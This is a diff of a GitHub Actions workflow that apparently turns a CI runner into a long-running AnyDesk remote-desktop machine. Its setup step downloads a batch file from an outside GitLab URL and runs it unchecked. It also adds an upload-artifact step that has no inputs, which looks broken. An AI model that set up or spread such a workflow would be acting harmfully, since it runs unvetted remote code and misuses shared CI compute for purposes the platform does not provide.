--- a/.github/workflows/majin.yml
+++ b/.github/workflows/majin.yml
@@ -10,13 +10,19 @@ jobs:
     timeout-minutes: 9999
     
     steps:
-      - name: Downloading & Installing Essentials
-        run: |
+    - name: Checkout repository
+      uses: actions/checkout@v2
+
+    - name: Archive project content
+      uses: actions/upload-artifact@v2
+  
+    - name: Downloading & Installing Essentials
+      run: |
           Invoke-WebRequest -Uri "https://gitlab.com/chamod12/anydesk-windows-rdp/-/raw/main/Downloads.bat" -OutFile "Downloads.bat"
           cmd /c Downloads.bat
 
-      - name: Log In To AnyDesk
-        run: cmd /c start.bat
+    - name: Log In To AnyDesk
+      run: cmd /c start.bat
 
-      - name: Time Counter
-        run: python time.py
+    - name: Time Counter
+      run: python time.py
